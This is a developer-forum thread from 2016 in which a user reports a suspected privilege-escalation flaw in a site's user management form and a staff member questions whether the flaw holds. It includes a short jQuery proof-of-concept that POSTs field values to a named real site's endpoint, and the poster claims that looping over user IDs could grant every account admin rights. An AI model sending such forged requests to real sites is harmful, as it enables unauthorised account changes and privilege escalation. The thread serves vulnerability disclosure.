Candidate security issue that allows full control at admin level

Peter Munkholm

Posted on 29/03/2016 13:56:55

This is only updating a custom field for the current user. But I think we can all see the possibilities. The only thing preventing this from being run from forign websites it the access allow origin header.
Otherwise, if you know the field names to update. Any field can be updated from anywhere on the website, capable of holding a standard HTML document

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>

<script>
$(document).ready(function(){
$.ajax({
   method: "POST",
   url: "http://gottfred.dk/Default.aspx?ID=2321&Purge=True",
   data: { "UserManagementForm": "1", "CustomField.AccessUser_AccessUser_Startpakke": "True", "HiddenField.CustomField.AccessUser_AccessUser_Startpakke": "True" }
   })
})
</script>

Replies

Nicolai Høeg Pedersen

Posted on 29/03/2016 14:47:38

Not sure I fully understand...

If you are logged in as a user, you can update information on that user?

Peter Munkholm

Posted on 30/03/2016 12:37:12

I succeeded in adding myself as a newsletter subscriber to the administrator group. I theory I could have added every single user in the database, just by looping through a number sequence. This can potentially give every useprofile in the solution full admin rights.

Peter Munkholm

Posted on 30/03/2016 12:40:43

All I need to gain admin rights, is have a user on the server, a newsletter subscriber will do. And a way of uploading an HTML file. Forms module with file upload will do.

Nicolai Høeg Pedersen

Posted on 30/03/2016 12:53:42

Hi Peter

The page you are submitting "UserManagementForm" to contains the usermanagement module? The code above will only update the current logged in user as I see it.

You must be logged in to post in the forum

Developer forum

Candidate security issue that allows full control at admin level

Replies